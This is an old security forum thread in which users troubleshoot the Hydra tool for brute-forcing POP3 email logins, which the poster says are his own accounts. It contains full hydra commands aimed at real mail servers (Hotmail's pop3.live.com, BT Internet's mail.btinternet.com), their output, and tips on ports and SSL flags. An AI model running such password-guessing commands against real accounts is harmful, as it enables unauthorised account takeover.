Brute Force Email With Hydra

[SystemCrash86]

There is alot of tutorials out there especially on youtube about how hydra can brute force router logins and telnet and ftp but i would like to know if its possible to brute force email because hydra supports pop3 and smtp etc .. so i put my actual password in a dictionary file hoping to see if it would work but it didnt work so i was wondering if it can actually be done and what i'm doing wrong.

[Infiltrator]

What exactly happens, when you run Hydra? Do you get any errors? Does it report what your password is?

[digip]

How are you pointing hydra at your email server? You have the correct address of the server and ports accesible? Some mail servers use port 995 for secure pop3, vs 110 for normal pop3. Open telnet to the mail server and pop3 default port, see if you can reach it. If not, then something is not configured properly or it might not be open. Then try telnet to same server on port 995. If neither work, then you have the wrong address. Forgot to mention, some might need the entire email address, and not just the name, or vice versa, so if you put in the entire email address, try it with just the name.

For command line use though, see here:

http://wiki.bywire.org/Hydra#POP3_Password_Bruteforce

(by the way, was able to bruteforce mine just now, works fine)

Edited October 21, 2011 by digip

[Infiltrator]

It must be the command usage, you may not be entering right. Are you able to post the commends you are entering?

[SystemCrash86]

When i use hydra i get:

root@bt:~# hydra -l myemailaddress@hotmail.co.uk -P /pentest/passwords/wordlists/password.lst pop3.live.com -s 995 pop3

Hydra v7.0 ©2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-22 12:24:36

WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...

[DATA] 16 tasks, 1 server, 2299 login tries (l:1/p:2299), ~143 tries per task

[DATA] attacking service pop3 on port 995

[sTATUS] 16.00 tries/min, 16 tries in 00:01h, 2283 todo in 02:23h

Error: Too many connect errors to target, disabling pop3://pop3.live.com

0 of 1 target successfuly completed, 0 valid passwords found

Error: 1 target did not resolve or could not be connected

Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-22 12:25:51

-l is my login username

-P is the password list where i added my own password

-i used pop3.live.com because i thought this was correct being as my account is hotmail.co.uk

-s 995 is what i believe is one of the ports mentioned earlier

-pop3 is the service type

I have never used hydra properly before in all the time i have had backtrack 4 and now backtrack 5 but i would like to learn how to use it properly. The commands i used here are what i was able to piece together from forums and such but as you can see i must be doing something wrong, maybe it could be me misusing the commands. If this is the case could someone tell me the correct command to use

[SystemCrash86]

How are you pointing hydra at your email server? You have the correct address of the server and ports accesible? Some mail servers use port 995 for secure pop3, vs 110 for normal pop3. Open telnet to the mail server and pop3 default port, see if you can reach it. If not, then something is not configured properly or it might not be open. Then try telnet to same server on port 995. If neither work, then you have the wrong address. Forgot to mention, some might need the entire email address, and not just the name, or vice versa, so if you put in the entire email address, try it with just the name.

For command line use though, see here:

http://wiki.bywire.org/Hydra#POP3_Password_Bruteforce

(by the way, was able to bruteforce mine just now, works fine)

What commands did you use in order to bruteforce it? i believe hydra works fine its just my command usage as mentioned

[Infiltrator]

The commands should be as the following:

Command line: ./hydra -l muts -P pass.txt my.pop3.mail pop3

bash-2.05b# ./hydra -l muts -P pass.txt my.pop3.mail pop3

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 4, login tries: 19 (l:1/p:19)] [110][pop3] login: muts password: mypassword Hydra finished.

bash-2.05b#

[digip]

I've noticed some issue with secure pop3, whcih runs on 995, try -S for ssl at the beginning of your command. More than likely, will not work against secure pop3, but give it a try.

Structure it like you did before but with the ssl switch like so:

hydra -S -l myemailaddress@hotmail.co.uk -P /pentest/passwords/wordlists/password.lst pop3.live.com -s 995 pop3

Thats a capital s at the beginning. Might help. I tried on my comcast and couldn't get it to work, but for my websites, which use normal pop3 (on 110), it worked fine.

[SystemCrash86]

The commands should be as the following:

Command line: ./hydra -l muts -P pass.txt my.pop3.mail pop3

bash-2.05b# ./hydra -l muts -P pass.txt my.pop3.mail pop3

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 4, login tries: 19 (l:1/p:19)] [110][pop3] login: muts password: mypassword Hydra finished.

bash-2.05b#

what is the command for the normal hotmail.co.uk because thats the one i'm using and i usually use windows live mail so what would the command be for the my.pop3.mail pop3?

[SystemCrash86]

I've noticed some issue with secure pop3, whcih runs on 995, try -S for ssl at the beginning of your command. More than likely, will not work against secure pop3, but give it a try.

Structure it like you did before but with the ssl switch like so:

hydra -S -l myemailaddress@hotmail.co.uk -P /pentest/passwords/wordlists/password.lst pop3.live.com -s 995 pop3

Thats a capital s at the beginning. Might help. I tried on my comcast and couldn't get it to work, but for my websites, which use normal pop3 (on 110), it worked fine.

I tried that with the command:

hydra -S -l myemailaddress@hotmail.co.uk -P /pentest/passwords/wordlists/password.lst pop3.live.com -s 995 pop3

and the results where as follows:

Process 20298: Can not connect [timeout], process exiting

[ERROR] Child with pid 20366 terminating, can not connect

[ERROR] Child with pid 20367 terminating, can not connect

Process 20306: Can not connect [timeout], process exiting

[ERROR] Child with pid 20373 terminating, can not connect

Process 20337: Can not connect [timeout], process exiting

Process 20338: Can not connect [timeout], process exiting

Process 20339: Can not connect [timeout], process exiting

[ERROR] Child with pid 20390 terminating, can not connect

[ERROR] Child with pid 20391 terminating, can not connect

[ERROR] Child with pid 20395 terminating, can not connect

[ERROR] Child with pid 20396 terminating, can not connect

[ERROR] Child with pid 20397 terminating, can not connect

[ERROR] Child with pid 20400 terminating, can not connect

[ERROR] Child with pid 20403 terminating, can not connect

[ERROR] Child with pid 20404 terminating, can not connect

[ERROR] Child with pid 20407 terminating, can not connect

[ERROR] Child with pid 20408 terminating, can not connect

[ERROR] Child with pid 20411 terminating, can not connect

[ERROR] Child with pid 20414 terminating, can not connect

[ERROR] Child with pid 20415 terminating, can not connect

[ERROR] Child with pid 20418 terminating, can not connect

[ERROR] Child with pid 20420 terminating, can not connect

Error: Too many connect errors to target, disabling pop3://pop3.live.com

0 of 1 target successfuly completed, 0 valid passwords found

[iNFO] Writing restore file because 1 server scan could not be completed

Error: 1 target was disabled because of too many errors

Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-22 16:11:38

Did i do something wrong?

Also i tried this on my other email address and i didnt get any errors but it failed to find my password even though i put it in my password list for it to be found

root@bt:~# hydra -l myemailaddress@btinternet.com -P /pentest/passwords/wordlists/password.lst mail.btinternet.com -s 110 pop3

Hydra v7.0 ©2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-22 17:22:23

WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...

[DATA] 16 tasks, 1 server, 2300 login tries (l:1/p:2300), ~143 tries per task

[DATA] attacking service pop3 on port 110

[sTATUS] 400.00 tries/min, 400 tries in 00:01h, 1900 todo in 00:05h

[sTATUS] 399.67 tries/min, 1199 tries in 00:03h, 1101 todo in 00:03h

[sTATUS] attack finished for mail.btinternet.com (waiting for children to finish)

1 of 1 target successfuly completed, 0 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-22 17:28:19

Edited October 22, 2011 by SystemCrash86

[Infiltrator]

Just wondering are you able to log into your Hotmail account as normal, when you are not using Hydra to brute force it?

[SystemCrash86]

Just wondering are you able to log into your Hotmail account as normal, when you are not using Hydra to brute force it?

yes everything works normal, i just wanted to test hydra to see if it works because i have never used it before. As you can see from the output earlier i must have done something wrong but not sure what it was.